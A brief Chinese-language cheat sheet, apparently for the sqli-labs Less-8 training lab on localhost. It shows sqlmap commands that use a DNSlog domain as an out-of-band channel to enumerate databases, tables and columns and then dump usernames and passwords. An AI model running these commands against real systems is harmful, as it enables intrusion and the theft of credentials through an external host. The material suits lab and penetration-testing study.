目录
sqlmap+DNSlog 外带参数 --dns-domain参数注入
--dns-domain参数为dnslog平台的域名(我们也可以使用本地)
爆库
python sqlmap.py -u "http://127.0.0.1/sqli/less-8/index.php/?id=1" -technique=B -dns-domain "域名" -dbs
爆表
python sqlmap.py -u "http://127.0.0.1/sqli/less-8/index.php/?id=1" -technique=B -dns-domain "域名" -D 库名 -tables
爆列
python sqlmap.py -u "http://127.0.0.1/sqli/less-8/index.php/?id=1" -technique=B -dns-domain "域名" -D security -T users --columns
爆数据
python sqlmap.py -u "http://127.0.0.1/sqli/less-8/index.php/?id=1" -technique=B -dns-domain "域名" -D security -T users -C username,password --dump
